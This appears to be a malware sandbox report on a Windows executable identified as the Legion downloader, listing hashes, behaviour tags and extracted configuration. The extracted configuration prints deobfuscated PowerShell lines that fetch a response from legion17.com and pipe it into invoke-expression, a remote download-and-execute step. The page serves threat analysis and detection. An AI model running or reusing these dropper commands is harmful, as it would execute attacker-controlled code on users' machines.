Overview

overview

10

Static

static

10

2b61b3b00a...30.exe

windows7_x64

6

2b61b3b00a...30.exe

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    2b61b3b00aa5d548e41dc305cb1271c26dc387601a7a7cdb63600b49c270bb30

  • Size

    184KB

  • Sample

    220615-cvcl9agefn

  • MD5

    d103074755792906a0aab038103444e3

  • SHA1

    ffb8d5a1d2d3dda1fa013168017bd833aaa28064

  • SHA256

    2b61b3b00aa5d548e41dc305cb1271c26dc387601a7a7cdb63600b49c270bb30

  • SHA512

    30be12dba187e19d797e6a5b502185ac37848ef80e9431e0cfb98c4b64c104f122fa2101538a0805513b7658bc8585a31ce0a8f00b725f33b8f70645e82e4660

Score
10/10
legiondownloader

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
&{$t = "iex", "(new-object Net.WebClient).UploadString('http://legion17.com/legion17/welcome','HorseHours')|iex", invoke-expression "(new-object Net.WebClient).UploadString('http://legion17.com/legion17/welcome','HorseHours')|iex"}
3
4
# powershell snippet 1
5
(new-object net.webclient).uploadstring("http://legion17.com/legion17/welcome", "HorseHours")|invoke-expression
6
URLs
ps1.dropper

http://legion17.com/legion17/welcome

Targets

    • Target

      2b61b3b00aa5d548e41dc305cb1271c26dc387601a7a7cdb63600b49c270bb30

    • Size

      184KB

    • MD5

      d103074755792906a0aab038103444e3

    • SHA1

      ffb8d5a1d2d3dda1fa013168017bd833aaa28064

    • SHA256

      2b61b3b00aa5d548e41dc305cb1271c26dc387601a7a7cdb63600b49c270bb30

    • SHA512

      30be12dba187e19d797e6a5b502185ac37848ef80e9431e0cfb98c4b64c104f122fa2101538a0805513b7658bc8585a31ce0a8f00b725f33b8f70645e82e4660

    Score
    10/10
    legiondownloader

    • Legion

      Legion is a malware downloader written in C++.

      downloaderlegion

    • Blocklisted process makes network request

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1behavioral2

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.